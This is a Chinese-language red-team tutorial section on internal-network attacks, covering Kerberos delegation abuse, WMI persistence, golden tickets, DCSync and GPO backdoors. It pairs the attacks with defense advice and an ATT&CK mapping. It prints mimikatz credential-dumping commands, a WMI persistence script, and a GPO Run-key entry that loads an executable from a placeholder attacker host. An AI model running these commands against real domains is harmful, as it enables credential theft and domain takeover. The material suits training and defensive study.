信息收集深度利用（下）

技术要点

1. 漏洞关联与武器化

• 利用Nessus或Nuclei扫描结果，提取未修复漏洞（如MS17-010、CVE-2020-1472）生成攻击链；

• 通过Metasploit模块自动化匹配漏洞与内网资产：

msf6> db_import nmap_scan.xml msf6> vulns search cve:2020-1472 

2. 敏感数据聚合分析

• 使用PowerSploit提取邮箱、共享文件中的关键词（如"password"、“token”）；

• 结合Elasticsearch搭建日志分析平台，定位管理员活动轨迹（RDP登录、文件修改）。

实战场景

• 场景：基于Kerberos委派的权限升级

1. 发现域内配置约束委派的服务账户：

Get-ADComputer -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo 

2. 伪造S4U请求获取高权限票据，接管目标服务（如SQL Server）。

防御建议

• 禁用非必要的Kerberos委派配置，定期审查msDS-AllowedToDelegateTo属性；

• 部署UEBA（用户实体行为分析）监控异常数据访问模式；

• 对漏洞扫描工具生成的报告进行敏感字段脱敏。

A-05-01 | 持久化后门与隐蔽通道技术

技术要点

1. 无文件后门技术

• 计划任务注入：利用WMI事件订阅实现重启后门（工具：WMIEvent）；

• 注册表映像劫持：修改Debugger键值劫持合法进程（如劫持notepad.exe加载恶意DLL）。

2. 隐蔽通信设计

• 基于HTTPS的C2心跳：使用Let’s Encrypt证书加密通信（工具：Cobalt Strike）；

• 合法协议滥用：通过ICMP/TCP协议伪装为CDN流量（如Cloudflare反向代理）。

实战场景

• 场景：WMI事件订阅持久化

1. 创建永久事件过滤器与消费者：

$filterArgs = @{ Name = '恶意事件过滤器'; EventNamespace = 'root\cimv2'; Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" } $consumerArgs = @{ Name = '恶意消费者'; CommandLineTemplate = "C:\Windows\System32\calc.exe" } Set-WmiInstance -Class __EventFilter -Arguments $filterArgs Set-WmiInstance -Class CommandLineEventConsumer -Arguments $consumerArgs 

2. 关联过滤器与消费者，实现系统级驻留。

防御建议

• 监控WMI永久事件订阅（工具：Sysinternals Autoruns）；

• 限制注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options写入权限；

• 部署网络流量基线分析，识别异常心跳周期。

A-06-01 | 域环境攻击链（黄金票据/DC Sync/组策略利用）

技术要点

1. 黄金票据伪造

• 利用域控KRBTGT账户的NTLM哈希生成万能票据：

mimikatz "kerberos::golden /domain:test.com /sid:S-1-5-21-123456789 /krbtgt:xxxx /user:administrator /ptt" 

• 绕过Kerberos PAC验证（需禁用KDC签名验证）。

2. DC Sync攻击

• 通过DRSUAPI协议模拟域控同步ntds.dit数据：

mimikatz "lsadump::dcsync /domain:test.com /user:Administrator" 

3. 组策略对象（GPO）滥用

• 篡改GPO部署恶意启动脚本或注册表项（工具：SharpGPOAbuse）。

实战场景

• 场景：GPO推送后门至全域主机

1. 定位具备WriteProperty权限的GPO：

Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty" } 

2. 修改GPO的User\Scripts\Logon脚本路径指向恶意PS1文件：

Set-GPRegistryValue -Name "Default Domain Policy" -Key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Update" -Value "\\攻击者IP\恶意脚本.exe" 

防御建议

• 定期重置KRBTGT账户密码（每30天）；

• 启用“特权账户保护”策略，限制DCSync权限；

• 监控GPO修改事件（Event ID 5136、5141）及SYSVOL目录变更。

扩展与深化方向

1. 红蓝对抗升级

• 针对EDR的绕过技术：进程空洞注入（Process Hollowing）、直接系统调用（Syscall）；

• 防御方可通过内存签名扫描（如YARA规则）检测无文件攻击。

2. 自动化攻击框架

• 整合分类体系中的技术点至Cobalt Strike或Sliver框架，生成模块化攻击链。

3. ATT&CK映射

| 技术点 | MITRE ID | 检测建议 |

|-------------------|----------------|--------------------------|

| 黄金票据 | T1558.001 | 监控异常Kerberos TGT请求 |

| DC Sync | T1003.003 | 审核域控DRSUAPI调用来源 |

| GPO后门 | T1484.001 | 对比GPO版本哈希值 |

此部分内容覆盖内网渗透终局阶段的核心技术，建议结合实战靶场（如Vulnstack、AttackRange）进行复现，强化攻防思维闭环。